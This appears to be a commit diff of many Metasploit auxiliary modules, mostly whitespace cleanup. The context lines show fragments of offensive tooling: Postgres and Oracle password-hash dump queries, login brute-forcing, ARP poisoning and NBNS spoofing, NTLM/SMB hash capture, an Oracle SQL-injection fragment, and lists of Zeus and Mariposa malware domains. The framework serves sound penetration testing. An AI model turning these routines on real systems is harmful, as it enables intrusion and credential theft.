print_error("#{rhost}:#{rport} JBoss error message: #{$1}")
end
apps = [ '/jmx-console/HtmlAdaptor',
'/status',
'/web-console/ServerInfo.jsp',
@ -66,12 +66,12 @@ class Metasploit3 < Msf::Auxiliary
'/web-console/Invoker',
'/invoker/JMXInvokerServlet'
]
print_status("#{rhost}:#{rport} Checking http...")
apps.each do |app|
check_app(app)
end
ports = {
# 1098i, 1099, and 4444 needed to use twiddle
1098 => 'Naming Service',

6
modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb
View File

@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
module will attempt to download the Majordomo config.pl file.
},
'Author' => ['Nikolas Sotiriu'],
'Version' => '$Revision$',
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '70762'],
@ -87,10 +87,10 @@ class Metasploit3 < Msf::Auxiliary
else
file_data = html.gsub(%r{(.*)<pre>|<\/pre>(.*)}m, '')
print_good("#{rhost}:#{rport} Successfully retrieved #{file} and storing as loot...")
# Transform HTML entities back to the original characters
file_data = file_data.gsub(/\&gt\;/i, '>').gsub(/\&lt\;/i, '<').gsub(/\&quot\;/i, '"')
store_loot("majordomo2.traversal.file", "application/octet-stream", rhost, file_data, file)
return
end

2
modules/auxiliary/scanner/http/owa_login.rb
View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('RPORT', [ true, "The target port", 443]),
OptString.new('VERSION', [ true, "OWA VERSION (2003, 2007, or 2010)", '2007'])
], self.class)
register_advanced_options(
[
OptString.new('AD_DOMAIN', [ false, "Optional AD domain to prepend to usernames", '']),

2
modules/auxiliary/scanner/http/scraper.rb
View File

@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
end
begin
res = send_request_raw({
'uri' => tpath,

2
modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb
View File

@ -13,7 +13,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient

4
modules/auxiliary/scanner/mysql/mysql_hashdump.rb
View File

@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("There was an error reading the MySQL User Table")
return
end
this_service = report_service(
:host => datastore['RHOST'],
:port => datastore['RPORT'],
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
next if row[0]== "test"
mysql_schema[row[0]]= get_tbl_names(row[0])
end
end
end
report_other_data(mysql_schema)
end

6
modules/auxiliary/scanner/oracle/isqlplus_login.rb
View File

@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),
], self.class)
end
def verbose; datastore['VERBOSE']; end
@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
elsif (version == 10)
postrequest = "username=#{user}&password=#{pass}&connectID=#{sid}&report=&script=&dynamic=&type=&action=&variables=&event=login"
end
begin
res = send_request_cgi({
'version' => '1.1',
@ -193,7 +193,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Unexpected Response of: #{res.code}")#''
return :abort
end
rescue ::Rex::ConnectionError => e
vprint_error("#{msg} - #{e}")
return :abort

4
modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb
View File

@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
def hostport
[target_host,rport].join(":")
end
def uri
datastore['URI'] || "/isqlplus/"
end
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
print_error "#{msg} Cannot connect"
rescue ::Timeout::Error, ::Errno::EPIPE,Errno::ECONNRESET => e
print_error e.message
end
end
end
def get_oracle_version(ip)

32
modules/auxiliary/scanner/oracle/oracle_hashdump.rb
View File

@ -16,8 +16,8 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::ORACLE
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Oracle Password Hashdump',
@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
'Description' => %Q{
This module dumps the usernames and password hashes
from Oracle given the proper Credentials and SID.
These are then stored as loot for later cracking.
These are then stored as loot for later cracking.
},
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
'License' => MSF_LICENSE
@ -34,23 +34,23 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
return if not check_dependencies
#Checks for Version of Oracle, 8g-10g all behave one way, while 11g behaves differently
#Also, 11g uses SHA-1 while 8g-10g use DES
is_11g=false
query = 'select * from v$version'
ver = prepare_exec(query)
if ver.nil?
print_error("An Error has occured, check your OPTIONS")
return
end
unless ver.empty?
if ver[0].include?('11g')
is_11g=true
print_status("Server is running 11g, using newer methods...")
end
end
end
this_service = report_service(
@ -59,14 +59,14 @@ class Metasploit3 < Msf::Auxiliary
:name => 'oracle',
:proto => 'tcp'
)
tbl = Rex::Ui::Text::Table.new(
'Header' => 'Oracle Server Hashes',
'Ident' => 1,
'Columns' => ['Username', 'Hash']
)
)
#Get the usernames and hashes for 8g-10g
begin
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
tbl << row
end
end
#Get the usernames and hashes for 11g
#Get the usernames and hashes for 11g
else
query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
results= prepare_exec(query)
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
tbl << row
end
end
end
rescue => e
print_error("An error occured. The supplied credentials may not have proper privs")
@ -99,14 +99,14 @@ class Metasploit3 < Msf::Auxiliary
end
print_status("Hash table :\n #{tbl}")
report_hashes(tbl.to_csv, is_11g, ip, this_service)
schema= get_schema()
unless schema.nil? or schema.empty?
report_other_data(schema,ip)
end
end
def get_schema
#Grabs the Database and table names for storage
#These names will be sued later to seed wordlists for cracking
@ -121,7 +121,7 @@ class Metasploit3 < Msf::Auxiliary
schema[db]= tables
end
end
end
return schema
end

4
modules/auxiliary/scanner/oracle/oracle_login.rb
View File

@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'URL', 'http://www.oracle.com/us/products/database/index.html' ],
[ 'CVE', '1999-0502'], # Weak password CVE
[ 'URL', 'http://nmap.org/nsedoc/scripts/oracle-brute.html']
[ 'URL', 'http://nmap.org/nsedoc/scripts/oracle-brute.html']
],
'Version' => '$Revision$'
))
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
def sid
datastore['SID'].to_s
end
def nmap_build_args(credpath)
nmap_reset_args
nmap_append_arg "-P0"

2
modules/auxiliary/scanner/pop3/pop3_login.rb
View File

@ -92,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("POP3 server does not appear to be running")
return :abort
end
vprint_status("#{target} - Trying user:'#{user}' with password:'#{pass}'")
cmd = "USER #{user}\r\n"
pop3_send(cmd,!@connected)

18
modules/auxiliary/scanner/postgres/postgres_hashdump.rb
View File

@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$',
'Description' => %Q{
This module extracts the usernames and encrypted password
hashes from a Postgres server and stores them for later cracking.
hashes from a Postgres server and stores them for later cracking.
},
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
'License' => MSF_LICENSE
@ -34,14 +34,14 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('DATABASE', [ true, 'The database to authenticate against', 'postgres']),
])
deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
end
def run_host(ip)
#Query the Postgres Shadow table for username and password hashes and report them
res = postgres_query('SELECT usename, passwd FROM pg_shadow',false)
#Error handling routine here, borrowed heavily from todb
case res.keys[0]
when :conn_error
@ -59,21 +59,21 @@ class Metasploit3 < Msf::Auxiliary
when :complete
print_status("Query appears to have run successfully")
end
this_service = report_service(
:host => datastore['RHOST'],
:port => datastore['RPORT'],
:name => 'postgres',
:proto => 'tcp'
)
tbl = Rex::Ui::Text::Table.new(
'Header' => 'Postgres Server Hashes',
'Ident' => 1,
'Columns' => ['Username', 'Hash']
)
res[:complete].rows.each do |row|
next if row[0].nil? or row[1].nil?
@ -93,11 +93,11 @@ class Metasploit3 < Msf::Auxiliary
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_postgreshashes.txt"
path = store_loot("postgres.hashes", "text/plain", datastore['RHOST'], hashtable, filename, "Postgres Hashes",service)
print_status("Hash Table has been saved: #{path}")
end
end

2
modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb
View File

@ -63,7 +63,7 @@ class Metasploit4 < Msf::Auxiliary
verbose = datastore['VERBOSE']
print_status("#{rhost}:#{rport} [SAP] Connecting to SAP Management Console SOAP Interface")
success = false
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
xsi = 'http://www.w3.org/2001/XMLSchema-instance'
xs = 'http://www.w3.org/2001/XMLSchema'

4
modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb
View File

@ -138,10 +138,10 @@ class Metasploit4 < Msf::Auxiliary
:data => {:proto => "soap", :users => users},
:update => :unique_data
)
users.each do |output|
print_good("#{rhost}:#{rport} [SAP] Extracted User: #{output[0]}")
end
end
return
elsif fault
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")

4
modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb
View File

@ -136,11 +136,11 @@ class Metasploit4 < Msf::Auxiliary
:data => {:proto => "soap", :env => env},
:update => :unique_data
)
env.each do |output|
print_status("#{output[0]}")
end
elsif fault
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
return

2
modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb
View File

@ -97,7 +97,7 @@ class Metasploit4 < Msf::Auxiliary
data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"><filename>' + "#{datastore['RFILE']}" + '</filename></' + ns1 + '>' + "\r\n"
data << '</SOAP-ENV:Body>' + "\r\n"
data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
begin
res = send_request_raw({
'uri' => "/#{datastore['URI']}",

2
modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb
View File

@ -161,7 +161,7 @@ class Metasploit4 < Msf::Auxiliary
saptbl << [ output[0], output[1], output[2] ]
end
print(saptbl.to_s)
print(saptbl.to_s)
return
elsif fault

2
modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb
View File

@ -149,7 +149,7 @@ class Metasploit4 < Msf::Auxiliary
print_status("#{output[0]}")
end
elsif fault
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
return

4
modules/auxiliary/scanner/smb/smb_enumshares.rb
View File

@ -49,11 +49,11 @@ class Metasploit3 < Msf::Auxiliary
'SPECIAL',
'TEMPORARY'
]
if val > (stypes.length - 1)
return 'UNKNOWN'
end
stypes[val]
end

4
modules/auxiliary/scanner/smb/smb_login.rb
View File

@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
result = try_user_pass(user.downcase, pass)
if result == :next_user
print_status("Username is case insensitive")
user = user.downcase
user = user.downcase
end
end
report_creds(user,pass)
@ -231,7 +231,7 @@ class Metasploit3 < Msf::Auxiliary
end
def report_creds(user,pass)
report_hash = {
:host => rhost,
:port => datastore['RPORT'],

4
modules/auxiliary/scanner/smtp/smtp_enum.rb
View File

@ -170,7 +170,7 @@ class Metasploit3 < Msf::Auxiliary
if (@coderesult == '501') && @domain.split(".").count > 2
print_error "#{target} - MX domain failure for #{@domain}, trying #{@domain.split(/\./).slice(-2,2).join(".")}"
cmd = 'MAIL FROM:' + " root@" + @domain.split(/\./).slice(-2,2).join(".") + "\r\n"
smtp_send(cmd,!@connected)
smtp_send(cmd,!@connected)
if (@coderesult == '501')
print_error "#{target} - MX domain failure for #{@domain.split(/\./).slice(-2,2).join(".")}"
return :abort
@ -178,7 +178,7 @@ class Metasploit3 < Msf::Auxiliary
elsif (@coderesult == '501')
print_error "#{target} - MX domain failure for #{@domain}"
return :abort
end
end
end
def do_rcpt_enum(user)

8
modules/auxiliary/scanner/snmp/cisco_upload_file.rb
View File

@ -45,20 +45,20 @@ class Metasploit3 < Msf::Auxiliary
# Start the TFTP Server
#
def setup
@path = datastore['SOURCE']
@filename = @path.split(/[\/\\]/)[-1] #/
# Setup is called only once
print_status("Starting TFTP server...")
@tftp = Rex::Proto::TFTP::Server.new(69, '0.0.0.0', { 'Msf' => framework, 'MsfExploit' => self })
# Register our file name and data
::File.open(@path, "rb") do |fd|
buff = fd.read(fd.stat.size)
@tftp.register_file(@filename, buff)
end
@tftp.start
add_socket(@tftp.sock)

2
modules/auxiliary/scanner/snmp/snmp_enumusers.rb
View File

@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
:type => 'snmp.users',
:data => @users
)
rescue ::SNMP::UnsupportedVersion
rescue ::SNMP::RequestTimeout

8
modules/auxiliary/scanner/snmp/snmp_login.rb
View File

@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
parse_reply(r)
end
end
idx += 1
end
@ -245,10 +245,10 @@ class Metasploit3 < Msf::Auxiliary
if(pkt[1] =~ /^::ffff:/)
pkt[1] = pkt[1].sub(/^::ffff:/, '')
end
asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil
return if not asn
snmp_error = asn.value[0].value rescue nil
snmp_comm = asn.value[1].value rescue nil
snmp_data = asn.value[2].value[3].value[0] rescue nil
@ -260,7 +260,7 @@ class Metasploit3 < Msf::Auxiliary
inf = snmp_info
com = snmp_comm
if(com)
@found[pkt[1]]||={}
if(not @found[pkt[1]][com])

4
modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb
View File

@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
end
}
print_good("#{ip} Found Users: #{@users.uniq.sort.join(", ")} ")
@users.each do |user|
report_note(
:host => rhost,
@ -70,4 +70,4 @@ class Metasploit3 < Msf::Auxiliary
print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")
end
end
end
end

2
modules/auxiliary/scanner/ssh/ssh_login.rb
View File

@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary
}
info = "#{proto_from_fullname} #{user}:#{pass} (#{ip}:#{port})"
s = start_session(self, info, merge_me, false, conn.lsock)
# Set the session platform
case proof
when /Linux/

4
modules/auxiliary/scanner/upnp/ssdp_msearch.rb
View File

@ -85,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary
server_thread = framework.threads.spawn("Module(#{self.refname})-Listener", false) { upnp_client_listener }
# TODO: Test to see if this scheme will work when pivoted.
# Create an unbound UDP socket if no CHOST is specified, otherwise
# create a UDP socket bound to CHOST (in order to avail of pivoting)
udp_send_sock = Rex::Socket::Udp.create(
@ -153,7 +153,7 @@ class Metasploit3 < Msf::Auxiliary
usn_string = $1
info << usn_string.to_s.strip
end
report_service(
:host => addr,
:port => port,

12
modules/auxiliary/scanner/voice/recorder.rb
View File

@ -35,11 +35,11 @@ class Metasploit3 < Msf::Auxiliary
def run
targets = crack_phone_ranges(datastore['TARGETS'].split(","))
connect
::FileUtils.mkdir_p( datastore['OUTPUT_PATH'] )
targets.each do |number|
c = create_call
begin
::Timeout.timeout( datastore['CALL_TIME'] ) do
@ -60,9 +60,9 @@ class Metasploit3 < Msf::Auxiliary
ensure
c.hangup rescue nil
end
print_status(" COMPLETED Number: #{number} State: #{c.state} Frames: #{c.audio_buff.length} DTMF: '#{c.dtmf}'")
if c.audio_buff.length > 0
opath = ::File.join( datastore['OUTPUT_PATH'], "#{number}.raw" )
cnt = 0
@ -77,5 +77,5 @@ class Metasploit3 < Msf::Auxiliary
# Next call
end
end
end

2
modules/auxiliary/server/browser_autopwn.rb
View File

@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
prints the names of all exploit modules that would be used by
the WebServer action given the current MATCH and EXCLUDE
options.
Also adds a 'list' command which is the same as running with
ACTION=list.
},

4
modules/auxiliary/server/capture/http_ntlm.rb
View File

@ -208,7 +208,7 @@ class Metasploit3 < Msf::Auxiliary
user = arg[:user]
host = arg[:host]
ip = arg[:ip]
unless @previous_lm_hash == lm_hash and @previous_ntlm_hash == nt_hash then
@previous_lm_hash = lm_hash
@ -268,7 +268,7 @@ class Metasploit3 < Msf::Auxiliary
# Display messages
domain = Rex::Text::to_ascii(domain)
user = Rex::Text::to_ascii(user)
user = Rex::Text::to_ascii(user)
capturedtime = Time.now.to_s
case ntlm_ver

2
modules/auxiliary/server/capture/smb.rb
View File

@ -488,7 +488,7 @@ class Metasploit3 < Msf::Auxiliary
lm_chall_message = lm_cli_challenge
end
# Display messages
if esn
smb[:username] = Rex::Text::to_ascii(smb[:username])

4
modules/auxiliary/server/ftp.rb
View File

@ -113,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary
pwd = ::File.join(datastore['FTPROOT'], @state[c][:cwd])
buf = ''
begin
Dir.new(pwd).entries.each do |ent|
path = ::File.join(datastore['FTPROOT'], ent)
@ -156,7 +156,7 @@ class Metasploit3 < Msf::Auxiliary
c.put "500 Access denied\r\n"
return
end
upath = ::File.expand_path(datastore['FTPROOT'])
npath = ::File.expand_path(::File.join(datastore['FTPROOT'], @state[c][:cwd], arg))
bpath = npath[upath.length, npath.length - upath.length]

2
modules/auxiliary/server/pxexploit.rb
View File

@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
partition seen. The windows user will have the password p@SSw0rd!123456
(in case of complexity requirements) and will be added to the administrators
group.
Note: the displayed IP address of a target is the address this DHCP server
handed out, not the "normal" IP address the host uses.
},

18
modules/auxiliary/spoof/arp/arp_poisoning.rb
View File

@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
else
shosts_range.each{|shost| if is_ipv4? shost then @shosts.push shost end}
end
if datastore['BROADCAST']
broadcast_spoof
else
@ -116,7 +116,7 @@ class Metasploit3 < Msf::Auxiliary
if capture and @spoofing and not datastore['BROADCAST']
print_status("RE-ARPing the victims...")
3.times do
3.times do
@dsthosts_cache.keys.sort.each do |dhost|
dmac = @dsthosts_cache[dhost]
if datastore['BIDIRECTIONAL']
@ -197,7 +197,7 @@ class Metasploit3 < Msf::Auxiliary
@dsthosts_cache[reply.arp_saddr_ip] = reply.arp_saddr_mac
end
end
end
#Wait some few seconds for last packets
etime = Time.now.to_f + datastore['TIMEOUT']
@ -221,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary
if @dsthosts_cache.has_key? shost
if datastore['VERBOSE']
print_status("Adding #{shost} from destination cache")
end
end
@srchosts_cache[shost] = @dsthosts_cache[shost]
next
end
@ -269,7 +269,7 @@ class Metasploit3 < Msf::Auxiliary
@spoofing = true
while(true)
if datastore['AUTO_ADD']
@mutex_cache.lock
@mutex_cache.lock
if @dsthosts_autoadd_cache.length > 0
@dsthosts_cache.merge!(@dsthosts_autoadd_cache)
@dsthosts_autoadd_cache = {}
@ -366,7 +366,7 @@ class Metasploit3 < Msf::Auxiliary
return unless pkt.arp_opcode == 2
pkt
end
def start_listener(dsthosts_cache, srchosts_cache)
if datastore['BIDIRECTIONAL']
@ -386,8 +386,8 @@ class Metasploit3 < Msf::Auxiliary
else
args[:shosts].each {|address| liste_src_ips.push address}
end
liste_dst_ips = []
args[:dhosts].each_key {|address| liste_dst_ips.push address}
liste_dst_ips = []
args[:dhosts].each_key {|address| liste_dst_ips.push address}
localip = args[:localip]
listener_capture = ::Pcap.open_live(@interface, 68, true, 0)
@ -419,7 +419,7 @@ class Metasploit3 < Msf::Auxiliary
@srchosts_autoadd_cache[pkt.arp_saddr_ip] = pkt.arp_saddr_mac
liste_src_ips.push pkt.arp_saddr_ip
@mutex_cache.unlock
end
end
end
end
end

6
modules/auxiliary/spoof/cisco/dtp.rb
View File

@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
deregister_options('RHOST', 'PCAPFILE')
end
def build_dtp_frame
p = PacketFu::EthPacket.new
p.eth_daddr = '01:00:0c:cc:cc:cc'
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
p.payload = llc_hdr << dtp_hdr
p
end
def is_mac?(mac)
!!(mac =~ /^([a-fA-F0-9]{2}:){5}[a-fA-F0-9]{2}$/)
end
@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
return @spoof_mac
end
def run
def run
unless smac()
print_error 'Source MAC (SMAC) should be defined'
else

2
modules/auxiliary/spoof/nbns/nbns_response.rb
View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
machine to an IP of the attacker's choosing. Combined with auxiliary/capture/server/smb or
capture/server/http_ntlm it is a highly effective means of collecting crackable hashes on
common networks.
This module must be run as root and will bind to tcp/137 on all interfaces.
},
'Author' => [ 'Tim Medin <tim@securitywhole.com>' ],

2
modules/auxiliary/spoof/replay/pcap_replay.rb
View File

@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','TIMEOUT','UDP_SECRET','GATEWAY','NETMASK')
end
def run
check_pcaprub_loaded # Check first
pkt_delay = datastore['PKT_DELAY']

2
modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb
View File

@ -60,7 +60,7 @@ COMMIT;
RETURN NULL;
END;
"
#PROCEDURE CREATE_CHANGE_SET
# Argument Name Type In/Out Default?
# ------------------------------ ----------------------- ------ --------

10
modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb
View File

@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
def run
@res = Net::DNS::Resolver.new()
domain = [
"lalundelau.sinip.es","bf2back.sinip.es","thejacksonfive.mobi",
"thejacksonfive.us","thejacksonfive.biz","butterfly.BigMoney.biz",
@ -49,15 +49,15 @@ class Metasploit3 < Msf::Auxiliary
"tamiflux.net","binaryfeed.in","youare.sexidude.com",
"mierda.notengodominio.com",
]
if datastore['DNS_SERVER']
@res.nameservers = datastore['DNS_SERVER']
end
count = 0
while count < datastore['COUNT']
domain.each do |name|
query = @res.query(name, "A")
time = Time.new

6
modules/auxiliary/vsploit/malware/dns/dns_query.rb
View File

@ -38,11 +38,11 @@ class Metasploit3 < Msf::Auxiliary
if datastore['DNS_SERVER']
@res.nameservers = datastore['DNS_SERVER']
end
count = 0
while count < datastore['COUNT']
domain = datastore['DOMAINS'].split(/[\s,]+/)
domain.each do |name|
query = @res.query(name, "A")

10
modules/auxiliary/vsploit/malware/dns/dns_zeus.rb
View File

@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
def run
@res = Net::DNS::Resolver.new()
domain = [
"allspring.net","antifoher.biz","asdfasdgqghgsw.cx.cc",
"ashnmjjpoljfnl.info","atlaz.net","b3l.org","back.boroborogold.ru",
@ -54,15 +54,15 @@ class Metasploit3 < Msf::Auxiliary
"favoritopilodjd.com","favqnornkwvkwfxv.biz","fdhjkfhskas.com",
"federalreserve-report.com","federetoktyt.net"
]
if datastore['DNS_SERVER']
@res.nameservers = datastore['DNS_SERVER']
end
count = 0
while count < datastore['COUNT']
domain.each do |name|
query = @res.query(name, "A")
time = Time.new

4
modules/auxiliary/vsploit/pii/web_pii.rb
View File

@ -12,13 +12,13 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
#
# This module acts as an compromised webserver distributing PII Data
#
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::PII
def initialize(info = {})
super(update_info(info,
'Name' => 'VSploit Web PII',